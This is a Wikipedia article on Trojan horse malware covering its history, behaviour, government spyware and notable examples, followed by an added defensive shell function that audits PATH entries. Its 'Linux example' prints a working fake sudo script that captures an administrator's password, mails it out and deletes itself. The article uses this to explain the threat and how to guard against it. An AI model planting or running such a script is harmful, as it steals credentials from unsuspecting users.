Trojan horse (computing) - Wikipedia


From Wikipedia, the free encyclopedia
In computing, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy.[1][2][3][4][5]

Trojans generally spread by some form of social engineering; for example, where a user is duped into executing an email attachment disguised to appear not suspicious (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer.[6] Ransomware attacks are often carried out using a trojan.

Unlike computer viruses, worms, and rogue security software, trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.[7]

Use of the term

It's not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both:[8]

"Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other’s files."
Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems.[9]

It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust",[10] subtitled: To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software. He mentioned that he knew about the possible existence of trojans from a report on the security of Multics.[11][12]

Behavior

Once installed, trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the trojan, using it as a proxy for malicious action.[13]

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.[14][15] Examples of govware trojans include the Swiss MiniPanzer and MegaPanzer[16] and the German "state trojan" nicknamed R2D2.[14] German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.[17]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them.[18] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a trojan infection.[19]

Linux example
A Trojan horse is a program that purports to perform some obvious function, yet upon execution it compromises the user's security.[20] One easy program is a new version of the Linux sudo command. The command is then copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory and executes sudo, then the Trojan horse might be executed. Here is a working version:

    :
    # sudo
    # ----
    # Turn off the character echo to the screen.
    stty -echo
    /bin/echo -n "Password for `whoami`: "
    read x
    /bin/echo ""
    # Turn back on the character echo.
    stty echo
    echo $x | mail -s "`whoami` password" [email protected]
    sleep 1
    echo Sorry.
    rm $0
    exit 0

To prevent a command-line based Trojan horse, set the . entry in the PATH= environment variable to be located at the tail end. For example:

    PATH=/usr/local/bin:/usr/bin:.

Notable examples

Private and governmental

ANOM - FBI
0zapftis / r2d2 StaatsTrojaner – DigiTask
DarkComet – CIA / NSA
FinFisher – Lench IT solutions / Gamma International
DaVinci / Galileo RCS – HackingTeam
Magic Lantern – FBI
SUNBURST – SVR / Cozy Bear (suspected)
TAO QUANTUM / FOXACID – NSA
WARRIOR PRIDE – GCHQ

Publicly available

EGABTR – late 1980s
Netbus – 1998 (published)[21]
Sub7 by Mobman – 1999 (published)
Back Orifice – 1998 (published)
Y3K Remote Administration Tool by E&K Tselentis – 2000 (published)
Beast – 2002 (published)
Bifrost trojan – 2004 (published)
DarkComet – 2008-2012 (published)
Blackhole exploit kit – 2012 (published)
Gh0st RAT – 2009 (published)
MegaPanzer BundesTrojaner – 2009 (published)[22][23]
MEMZ by Leurak – 2016 (published)

Detected by security researchers

Twelve Tricks – 1990
Clickbot.A – 2006 (discovered)
Zeus – 2007 (discovered)
Flashback trojan – 2011 (discovered)
ZeroAccess – 2011 (discovered)
Koobface – 2008 (discovered)
Vundo – 2009 (discovered)
Meredrop – 2010 (discovered)
Coreflood – 2010 (discovered)
Tiny Banker Trojan – 2012 (discovered)
Shedun Android malware – 2015 (discovered)[24][25][26][27][28][29]

Capitalization

The computer term "trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.[30][31]

See also
Computer security
Cuckoo's egg (metaphor)
Cyberspying
Dancing pigs
Exploit (computer security)
Industrial espionage
Principle of least privilege
Privacy-invasive software
Remote administration
Remote administration software
Reverse connection
Rogue security software
Scammers
Technical support scam
Timeline of computer viruses and worms
Zombie (computer science)

References

1. Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). A taxonomy of computer program security flaws, with examples. DTIC Document. CiteSeerX 10.1.1.35.997. Retrieved April 5, 2012.
2. "Trojan Horse Definition". Retrieved April 5, 2012.
3. "Trojan horse". Webopedia. Retrieved April 5, 2012.
4. "What is Trojan horse? – Definition from Whatis.com". Retrieved April 5, 2012.
5. "Trojan Horse: [coined By MIT-hacker-turned-NSA-spook Dan Edwards] N." Retrieved April 5, 2012.
6. "Difference between viruses, worms, and trojans". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
7. "VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
8. Thompson, K. "UNIX PROGRAMMER'S MANUAL, November 3, 1971" (PDF). Retrieved March 28, 2020.
9. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis, ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
10. Ken Thompson (1984). "Reflections on Trusting Trust". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210.
11. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
12. Karger and Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
13. Crapanzano, Jamie (2003). Deconstructing SubSeven, the Trojan Horse of Choice (Report). SANS Institute. Retrieved May 10, 2021.
14. Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
15. "Häufig gestellte Fragen (Frequently Asked Questions)". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
16. Dunn, John (August 27, 2009). "Swiss coder publicises government spy Trojan". TechWorld. Archived from the original on January 26, 2014. Retrieved January 10, 2021.
17. "German federal police use trojan virus to evade phone encryption". DW. Retrieved April 14, 2018.
18. "BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends". BitDefender. Archived from the original on August 8, 2009. Retrieved March 27, 2020.
19. Datta, Ganesh (August 7, 2014). "What are Trojans?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
20. Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 42. ISBN 0-8104-6267-2.
21. Seth, Kulakow (1998). "Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?" (Report). SANS Institute. Retrieved May 10, 2021.
22. "Mega-Panzer". SourceForge.
23. "Mini-Panzer". SourceForge.
24. "Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog".
25. Neal, Dave (November 20, 2015). "Shedun trojan adware is hitting the Android Accessibility Service". The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.
26. "Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog".
27. "Shuanet, ShiftyBug and Shedun malware could auto-root your Android". November 5, 2015.
28. Times, Tech (November 9, 2015). "New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug".
29. "Android adware can install itself even when users explicitly reject it". November 19, 2015.
30. "trojan". Collins Advanced Dictionary. Retrieved March 29, 2020.
31. "trojan horse". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.
External links

Media related to Trojan horse (malware) at Wikimedia Commons
"CERT Advisory CA-1999-02 Trojan Horses" (PDF). Carnegie Mellon University Software Engineering Institute. Archived from the original on October 17, 2000. Retrieved September 15, 2019.

Retrieved from "https://en.wikipedia.org/w/index.php?title=Trojan_horse_(computing)&oldid=1074020901"
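The PATH advice in the Linux example section moves . to the tail end; a trailing . is still searched for any command name not found in the earlier directories, and a publicly writable directory such as /tmp listed in PATH carries the same risk. As an added example (not part of the original article; the function name audit_path and the finding labels are assumptions made here), this POSIX shell function reports every such entry together with its position in the search order:

```shell
#!/bin/sh
# Added example (not from the article): list PATH entries that would let a
# file dropped in the current or a shared directory shadow a command.

# audit_path PATHSTRING
# Prints "<position>:<kind>:<entry>" for each risky entry.
# Returns 0 if nothing was flagged, 1 otherwise.
audit_path() {
    rest="$1:"        # trailing ":" so a final empty entry is still visited
    position=0
    findings=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}     # text before the first colon
        rest=${rest#*:}       # text after the first colon
        position=$((position + 1))
        kind=
        case "$entry" in
            '') kind=empty-means-cwd ;;   # "::" or a leading/trailing ":"
            .)  kind=cwd ;;
            /*) # Absolute path: flag it if any user may create files there.
                # -H makes find test the target of a symlink such as /bin.
                if [ -d "$entry" ] &&
                   [ -n "$(find -H "$entry" -prune -perm -0002 2>/dev/null)" ]
                then
                    kind=world-writable
                fi ;;
            *)  kind=relative ;;
        esac
        if [ -n "$kind" ]; then
            printf '%s:%s:%s\n' "$position" "$kind" "$entry"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# The article's suggested value: "." is last but is still reported.
audit_path "/usr/local/bin:/usr/bin:." || echo "PATH needs attention"
```

Running `audit_path "$PATH"` in a login shell and in root's environment shows whether either search path contains an entry of these kinds.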